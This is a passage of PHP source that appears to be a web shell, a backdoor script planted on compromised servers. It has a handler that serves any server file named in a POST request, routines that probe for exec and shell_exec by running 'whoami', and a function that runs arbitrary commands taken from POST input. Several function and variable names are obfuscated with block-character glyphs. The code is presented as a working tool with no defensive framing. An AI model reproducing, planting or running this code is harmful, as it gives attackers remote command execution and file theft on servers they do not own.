table{display:none;}"; if(isset($_GET['option']) && $_POST['opt'] == 'download'){ header('Content-type: text/plain'); header('Content-Disposition: attachment; filename="'.$_POST['name'].'"'); echo(file_get_contents($_POST['path'])); exit(); } if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } function â–Ÿ($dir,$p) { if (isset($_GET['path'])) { $â–š = $_GET['path']; } else { $â–š = getcwd(); } if (is_writable($â–š)) { return ""; } else { return ""; } } function dc($dir,$p) { if (isset($_GET['path'])) { $â–š = $_GET['path']; } else { $â–š = getcwd(); } if (is_writable($â–š)) { return ""; } else { return ""; } } function ip() { $ipas = ''; if (getenv('HTTP_CLIENT_IP')) $ipas = getenv('HTTP_CLIENT_IP'); else if(getenv('HTTP_X_FORWARDED_FOR')) $ipas = getenv('HTTP_X_FORWARDED_FOR'); else if(getenv('HTTP_X_FORWARDED')) $ipas = getenv('HTTP_X_FORWARDED'); else if(getenv('HTTP_FORWARDED_FOR')) $ipas = getenv('HTTP_FORWARDED_FOR'); else if(getenv('HTTP_FORWARDED')) $ipas = getenv('HTTP_FORWARDED'); else if(getenv('REMOTE_ADDR')) $ipas = getenv('REMOTE_ADDR'); else $ipas = 'IP tidak dikenali'; return $ipas; } function ekse() { $cmd = "whoami"; $return = ""; $output = ""; $methodArray = array(); //exec() $return = ""; $output = ""; exec($cmd, $output, $return); if (strlen($output[0]) > 0 && $return == 0) { $methodArray[] = "exec"; } //shell_exec() $return = ""; $output = ""; $output = shell_exec($cmd); if (strlen($output) > 0) { $methodArray[] = "shell_exec"; } return $methodArray; } function ekseCMD($cmd, $method) { if ($method == "") { ob_start(); $methodArray = ekse(); ob_end_clean(); if (is_array($methodArray)) { $method = $methodArray[0]; } } switch ($method) { case "exec": exec($cmd, $output); var_dump($output); break; case "shell_exec": echo shell_exec($cmd); break; } } $cmd = htmlspecialchars($_POST["cmd"]); $method = htmlspecialchars($_POST["execCMD"]); function p($file){ $p = fileperms($file); if (($p & 0xC000) == 0xC000) { $i = 's'; } elseif (($p & 0xA000) == 0xA000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; exit(); } echo "
"; ?>